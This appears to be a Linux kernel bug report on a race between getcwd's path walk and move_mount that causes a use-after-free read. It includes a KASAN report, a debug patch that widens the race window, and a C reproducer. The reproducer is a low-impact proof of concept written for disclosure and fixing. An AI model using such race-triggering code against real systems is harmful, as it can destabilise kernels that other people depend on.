As the subject says, there's a race between d_path() (specifically
__prepend_path()) looking at mnt->mnt_ns with is_anon_ns(), and
do_move_mount() switching out the ->mnt_ns and freeing the old one.
This can theoretically lead to a use-after-free read, but it doesn't seem
to be very interesting from a security perspective, since all it gets you
is a comparison of a value in freed memory with zero.

KASAN splat from a kernel that's been patched to widen the race window:

==================================================================
BUG: KASAN: use-after-free in prepend_path (fs/mount.h:146 fs/d_path.c:127 fs/d_path.c:177)
Read of size 8 at addr ffff88800add2748 by task SLOWME/685

CPU: 8 PID: 685 Comm: SLOWME Not tainted 6.0.0-rc5-00015-ge839a756012b-dirty #110
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-4 04/01/2014
Call Trace:
<TASK>
dump_stack_lvl (lib/dump_stack.c:107 (discriminator 1))
print_report.cold (mm/kasan/report.c:318 mm/kasan/report.c:433)
[...]
kasan_report (mm/kasan/report.c:162 mm/kasan/report.c:497)
[...]
prepend_path (fs/mount.h:146 fs/d_path.c:127 fs/d_path.c:177)
[...]
__do_sys_getcwd (fs/d_path.c:438)
[...]
do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:120)
[...]
</TASK>

Allocated by task 685:
kasan_save_stack (mm/kasan/common.c:39)
__kasan_kmalloc (mm/kasan/common.c:45 mm/kasan/common.c:437 mm/kasan/common.c:516 mm/kasan/common.c:525)
alloc_mnt_ns (./include/linux/slab.h:600 ./include/linux/slab.h:733 fs/namespace.c:3426)
__do_sys_fsmount (fs/namespace.c:3720)
do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:120)

Freed by task 686:
kasan_save_stack (mm/kasan/common.c:39)
kasan_set_track (mm/kasan/common.c:45)
kasan_set_free_info (mm/kasan/generic.c:372)
____kasan_slab_free (mm/kasan/common.c:369 mm/kasan/common.c:329)
kfree (mm/slub.c:1780 mm/slub.c:3534 mm/slub.c:4562)
do_move_mount (fs/namespace.c:2899)
__x64_sys_move_mount (fs/namespace.c:3812 fs/namespace.c:3765 fs/namespace.c:3765)
do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:120)

The buggy address belongs to the object at ffff88800add2700
which belongs to the cache kmalloc-128 of size 128
The buggy address is located 72 bytes inside of
128-byte region [ffff88800add2700, ffff88800add2780)
[...]
Memory state around the buggy address:
 ffff88800add2600: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
 ffff88800add2680: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
>ffff88800add2700: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
                                              ^
 ffff88800add2780: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
 ffff88800add2800: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
==================================================================

To reproduce, apply this kernel patch to widen the race window:

diff --git a/fs/d_path.c b/fs/d_path.c
index e4e0ebad1f153..51fbed8deffe4 100644
--- a/fs/d_path.c
+++ b/fs/d_path.c
@@ -7,6 +7,7 @@
 #include <linux/slab.h>
 #include <linux/prefetch.h>
 #include "mount.h"
+#include <linux/delay.h>
 
 struct prepend_buffer {
 	char *buf;
@@ -117,6 +118,11 @@ static int __prepend_path(const struct dentry *dentry, const struct mount *mnt,
 			}
 			/* Global root */
 			mnt_ns = READ_ONCE(mnt->mnt_ns);
+			if (strcmp(current->comm, "SLOWME") == 0) {
+				pr_warn("%s: begin delay\n", __func__);
+				mdelay(1000);
+				pr_warn("%s: end delay\n", __func__);
+			}
 			/* open-coded is_mounted() to use local mnt_ns */
 			if (!IS_ERR_OR_NULL(mnt_ns) && !is_anon_ns(mnt_ns))
 				return 1;	// absolute root

Then run this reproducer (build with "-pthread"):

#define _GNU_SOURCE
#include <pthread.h>
#include <unistd.h>
#include <err.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include <sys/mount.h>
#include <linux/mount.h>

/*
 * Evaluate x once; if the result equals -1 (converted to x's own type),
 * print the stringified expression via err() and exit with status 1.
 * Otherwise the whole expression yields the result.
 * Uses the GNU statement-expression and typeof extensions.
 */
#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

/*
 * Thin wrapper that issues the fsconfig system call through syscall();
 * a -1 return aborts the program via SYSCHK.
 */
void fsconfig(int fd, unsigned int cmd, char *key, void *value, int aux) {
  SYSCHK(syscall(__NR_fsconfig, fd, cmd, key, value, aux));
}

/* Mount fd created in main() and consumed by thread_fn(). */
static int mnt_fd = -1;

/*
 * Racing thread: attaches the mount behind mnt_fd at /dev/shm/test while
 * the main thread is inside the delayed getcwd(). The "Freed by" stack in
 * the KASAN report above shows the kfree() happening in do_move_mount().
 */
static void *thread_fn(void *dummy) {
  /* Return value deliberately unchecked, so an existing directory is fine. */
  mkdir("/dev/shm/test", 0700);
  /* Empty source path + MOVE_MOUNT_F_EMPTY_PATH: the source is mnt_fd itself. */
  SYSCHK(syscall(__NR_move_mount, mnt_fd, "", AT_FDCWD, "/dev/shm/test", MOVE_MOUNT_F_EMPTY_PATH));
  /* Wait one second, then lazily detach the mount again as cleanup. */
  sleep(1);
  SYSCHK(umount2("/dev/shm/test", MNT_DETACH));
  return NULL;
}

/*
 * Main thread: creates a tmpfs mount with fsopen/fsconfig/fsmount, makes it
 * the current directory, starts the racing thread, and then calls getcwd()
 * under the task name "SLOWME" so that the debug patch above stalls
 * __prepend_path() after it has read mnt->mnt_ns.
 */
int main(void) {
  int fs_fd = SYSCHK(syscall(__NR_fsopen, "tmpfs", 0));
  fsconfig(fs_fd, FSCONFIG_CMD_CREATE, NULL, NULL, 0);
  /* The "Allocated by" stack in the report shows alloc_mnt_ns() called from fsmount. */
  mnt_fd = SYSCHK(syscall(__NR_fsmount, fs_fd, 0, MOUNT_ATTR_NOSUID | MOUNT_ATTR_NODEV));
  SYSCHK(close(fs_fd));
  /* Put the working directory inside the new mount so getcwd() has to walk it. */
  SYSCHK(fchdir(mnt_fd));

  pthread_t thread;
  if (pthread_create(&thread, NULL, thread_fn, NULL))
    errx(1, "pthread_create");

  char buf[0x10000];
  /* The name must match the strcmp() in the kernel patch; only this call is delayed. */
  SYSCHK(prctl(PR_SET_NAME, "SLOWME"));
  /*
   * NOTE(review): getcwd() signals failure with NULL, which SYSCHK's
   * comparison against -1 does not catch, so an error here goes unnoticed.
   */
  SYSCHK(getcwd(buf, sizeof(buf)));
  SYSCHK(prctl(PR_SET_NAME, "dummy"));
  /* Step out of the test mount before waiting for the other thread. */
  SYSCHK(chdir("/"));

  if (pthread_join(thread, NULL))
    errx(1, "pthread_join");
  SYSCHK(close(mnt_fd));
  return 0;
}